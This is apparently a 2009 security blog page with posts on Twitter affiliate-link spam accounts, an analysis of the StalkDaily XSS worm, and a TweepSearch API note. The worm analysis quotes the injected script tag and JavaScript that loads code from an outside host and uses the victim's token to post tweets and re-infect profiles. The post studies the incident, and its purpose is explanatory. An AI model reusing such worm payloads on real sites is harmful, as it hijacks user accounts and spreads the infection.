DCortesi . blog

Every once in a while I revisit Twitter Spam. It’s always interesting to see the evolution of spammers as it’s happened on other social networks before and their behavior on Twitter is similar.

Essentially, they get smarter. It’s as simple as that. Early spammers on Twitter would simply follow lots of people and send obviously spammy messages. Twitter put a cap on that with their follow limits. Spammers of course then gamed the system by figuring out who had auto-follow turned on and following those folks as well as following regular people and unfollowing when not mutual. Twitter is since in the process of disabling auto-follow, though other services exist and will pop up.

The latest iteration, which I’d seen evidence of before but only from the initial prep stage, is the “almost real” accounts. Let’s take a look at @james_mahoney.

Spam(?) Account on Twitter

Now this looks like a fairly normal account. Tweeting about basketball, college. But let’s take a closer look at a couple of those messages. Specifically because they might look a bit familiar…

Yup, that’s right. Those tweets are simply duplicates of tweets made earlier by other, real people. This account is simply duplicating them to appear legitimate. Now those links for the Kindle are starting to look a little suspicious, too. If we take a closer look, we notice that it’s a legitimate link to Amazon, but with the spammer’s associate code in the URL.

You can see that his account also looks real enough that people even engage in conversation.

So the associate code means this spammer will get a few bucks if somebody actually buys the Kindle. How many times does @James_Mahoney send out these tweets? About 200 out of 800 - just see for yourself. Even a few hits makes it worth it if this is automated in any fashion.

A final note - want to find some other accounts in the initial phase of this scam? Just click through some of the recent follower icons on @James_Mahoney’s page, particularly the ones with the default avatar - you’ll notice they all have an eerily similar set of first messages. Welcome to Social Network Spam.

Thanks to Mike Dahn for the heads up on Mr. Spammy Spammer.

(p.s. Don’t forget to click my affiliate link to the right. ;))

Twitter got hit with a little security incident this afternoon we’ll call the “StalkDaily Worm”. I have no clue if the StalkDaily site was actually associated with the worm at this point or if it was simply a misdirection. I believe it to be the latter.

At around 3:43pm PST this afternoon I noticed some odd updates from a couple of my friends regarding the StalkDaily site. I then saw this tweet from @JoeCascio:

First virus-like hack of Twitter is StalkDaily.com. Looks like a code injection in the Location field of your profile.

Coming from Joe, I knew something was up. Looking at one of the infected profiles I saw a link to the StalkDaily site, but then also some script tags. These typically aren’t allowed as part of a profile URL and looked suspicious:

<a href="http://www.stalkdaily.com"/><script src="hxxp://mikeyylolz.uuuq.com/x.js>"

That part in red is particularly bad and is what was getting injected into people’s profiles. Taking a quick look at the JavaScript that it actually links to, there were a few lines in particular that caught my eye:

var update = urlencode("Hey everyone, join www.StalkDaily.com. It’s a site like Twitter but with pictures, videos, and so much more! :)");
var xss = urlencode(’http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ‘);

var ajaxConn = new XHConn();
ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+update+"&tab=home&update=update");
ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");

What’s happening here is that it looks like somebody realized they could save url encoded data to the profile URL field that would not be properly escaped when re-displayed. This is particularly nasty because you could get infected simply by viewing somebody’s profile page on Twitter that was already infected. If you visited an infected profile, the JavaScript in the profile would execute and by doing so tweet the mis-leading link, and update your profile with the same malicious JavaScript thereby infecting anybody that then visits your profile on twitter.com.

This was a nasty little script.

This is also one of the reasons that I browse the web with NoScript. It’s a hassle, sure, but it prevented the script from an untrusted domain (uuuq.com) from running on Twitter.com.

As we’ve seen with worms in the past, this attack was loud and noisy and all the attackers did was collect your Twitter username and cookie. Had they been playing for real, a more profitable approach would have been to leave your profile URL intact and insert some JavaScript that turned your browser into an endpoint on a bot network. </doomandgloom>

It looks like Twitter has already taken care of the issue for the most part. Thanks to @al3x and crew for their near-instant response on what was likely a nice relaxing Saturday afternoon.

If you have the stalkdaily URL in your profile, you were likely attacked by this issue. Twitter has taken care of it at this point, so feel free to correct your URL and continue with your Saturday evening Twittering. There’s some more information on this post.

Be safe out there - the Internet is a dangerous place.

Update (2009-04-12): A brief update - another round of the worm hit Twitter on Sunday morning. It was effectively the same thing, but attacked a different field. The code, oddly enough, had also been run through an obfuscator. You can see the partially obfuscated code from the second worm here: second version of worm.

In the interest of making profile search more available to interested Twitter developers, I’ve added XML and JSON-formatted output to TweepSearch. Shown below is a simple example that allows you to query TweepSearch from any site using JSON callbacks. This is available free of charge for the time being, but if usage exceeds my current hosting capabilities I may start charging a small fee.

See the TweepSearch Help page for information on other search operators.

Enter a search term:

The quick hack of the javascript code that made this possible is on github, feel free to steal and make better.